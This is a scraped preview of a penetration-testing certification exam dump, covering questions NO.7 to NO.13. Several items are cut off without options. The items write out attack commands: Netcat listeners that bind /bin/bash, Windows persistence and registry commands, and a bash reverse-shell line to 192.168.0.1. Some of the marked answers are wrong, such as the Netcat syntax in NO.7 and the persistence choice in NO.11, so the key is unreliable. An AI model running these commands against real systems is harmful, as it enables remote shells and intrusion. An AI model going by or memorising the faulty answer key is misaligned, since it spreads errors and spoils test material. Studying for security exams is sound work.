100%(9)9 out of 9 people found this document helpful
This preview shows page 3 - 6 out of 46 pages.
NO.7A penetration tester has compromised a host. Which of the following would be the correctsyntax to create a Netcat listener on the device?A.nc -lvp 4444 /bin/bashB.nc -vp 4444 /bin/bashC.nc -p 4444 /bin/bashD.nc -lp 4444 -e /bin/bashAnswer:ANO.8When performing compliance-based assessments, which of the following is the MOSTimportant Key consideration?NO.9A company contracted a firm specializing in penetration testing to assess the security of a corebusiness application. The company provided the firm with a copy of the Java bytecode. Which of thefollowing steps must the firm take before it can run a static code analyzer?IT Certification Guaranteed, The Easy Way!3
NO.10A security assessor is attempting to craft specialized XML files to test the security of theparsing functions during ingest into a Windows application. Before beginning to test the application,which of the following should the assessor request from the organization?NO.11A penetration tester has compromised a Windows server and is attempting to achievepersistence. Which of the following would achieve that goal?A.schtasks.exe /create/tr "powershell.exe" Sv.ps1 /runB.net session server | dsquery -user | net use c$C.powershell && set-executionpolicy unrestrictedD.reg save HKLM\System\CurrentControlSet\Services\Sv.regAnswer:DNO.12The following line was found in an exploited machine's history file. An attacker ran thefollowing command:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does?NO.13A security consultant is trying to attack a device with a previously identified user account.Which of the following types of attacks is being executed?IT Certification Guaranteed, The Easy Way!4